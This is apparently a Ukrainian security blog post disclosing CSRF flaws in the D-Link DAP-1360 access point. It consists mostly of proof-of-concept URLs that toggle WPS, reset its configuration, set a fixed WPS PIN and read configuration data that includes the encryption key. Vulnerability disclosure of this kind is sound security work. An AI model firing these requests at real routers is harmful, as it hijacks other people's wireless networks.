Нові CSRF уразливості в D-Link DAP-1360
20:09 27.01.2016Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).
CSRF (WASC-09):
В розділі Wi-Fi - WPS можна змінити параметр WPS Enable:
Увімкнути:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}}
Вимкнути:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}}
Можна відмінити конфігурацію (Reset to unconfigured):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}
Можна прочитати дані про конфігурацію в Information - Refresh. Через XSS атаку з цієї сторінки можна отримати дані про ключ Encryption key (це спрацює навіть при вимкненому WPS):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0
Можна змінити метод в Connection - WPS Method:
PBC:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}}
PIN:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}}
Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.